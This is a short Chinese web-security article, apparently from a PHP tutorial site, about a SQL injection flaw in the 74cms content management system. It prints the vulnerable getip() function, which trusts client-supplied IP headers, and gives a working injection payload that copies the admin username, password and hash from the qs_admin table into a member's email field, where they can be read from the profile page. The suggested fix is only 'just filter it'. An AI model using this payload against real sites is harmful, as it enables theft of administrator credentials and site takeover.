骑士CMS(74cms)sql注入漏洞及修复 - 网站安全

骑士CMS(74cms)sql注入漏洞及修复 - 网站安全 - 自学

来源：自学PHP网时间：2015-04-17 14:47 作者：阅读:次

[导读] 74cms sql注入漏洞function getip(){ if(getenv(#39;HTTP_CLIENT_IP#39;)){ $onlineip=getenv(#39;HTTP_CLIENT_IP#39;);}else if(getenv(#39;HTTP_X_FORWARDED_FOR#39;)){ $onlineip=getenv(#39;HT......

74cms sql注入漏洞
function getip()
{
if(getenv('HTTP_CLIENT_IP')){
$onlineip=getenv('HTTP_CLIENT_IP');
}else if(getenv('HTTP_X_FORWARDED_FOR')){
$onlineip=getenv('HTTP_X_FORWARDED_FOR');
}else if(getenv('REMOTE_ADDR')){
$onlineip=getenv('REMOTE_ADDR');
}else{
$onlineip=$_SERVER['REMOTE_ADDR'];
}
return $onlineip;
}
ip没过滤

我们可以这样注入
www.2cto.com $getinj="zyday1.1.', email=(SELECT concat(admin_name,0x2f,pwd,0x2f,pwd_hash ) FROM qs_admin) where username = '$dpusername'#";
就是把查询到的账号密码赋值给email...接着在会员中心查看个人资料就可以爆账号和密码和hash了

修复：过滤下就行了

phpcms 2008 sp4 comment.php页面SQL注入漏洞分析 - 网站

企成食品行业网站源码1.0 注入漏洞及修复 - 网站

子栏目

骑士CMS(74cms)sql注入漏洞及修复 - 网站安全 - 自学

最新评论

添加评论

更多文章推荐

添加评论